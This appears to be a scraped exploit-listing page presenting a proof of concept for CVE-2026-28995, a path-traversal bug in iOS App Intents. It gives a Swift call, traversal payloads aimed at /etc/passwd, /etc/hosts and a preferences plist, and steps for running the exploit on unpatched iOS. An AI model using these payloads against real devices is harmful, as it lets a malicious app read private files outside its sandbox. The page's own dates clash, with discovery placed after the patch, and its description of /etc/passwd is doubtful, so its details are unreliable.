## https://sploitus.com/exploit?id=5E384957-8285-5247-95CE-C7384C91A926
# CVE-2026-28995
**Proof of Concept for CVE-2026-28995** โ Path Traversal vulnerability in App Intents on iOS 26.4.2 and below.
## Description
This vulnerability allows a malicious app to **read any file** outside its sandbox via App Intents. The root cause is insufficient path validation in Apple's App Intents framework.
**Affected versions:** iOS 26.4.2 and below
**Patched in:** iOS 26.5 (May 11, 2026)
## Usage
### 1. Function `readCve(path: String) -> String`
```swift
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
```
2. Path Examples
Path Reads
../../../../../../../../../../../../../etc/passwd User passwords
../../../../../../../../../../../../../etc/hosts Hosts file
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist System preferences
3. Directory Handling
If the path points to a directory, the function returns:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
How to Run
Create an iOS project in Xcode.
Add CVE-2026-28995.swift to the project.
Call readCve(path:) with the target path.
Run on iOS 26.4.2 or earlier.
Responsible Disclosure
Discovered: July 1, 2026
Patched in: iOS 26.5 (May 11, 2026)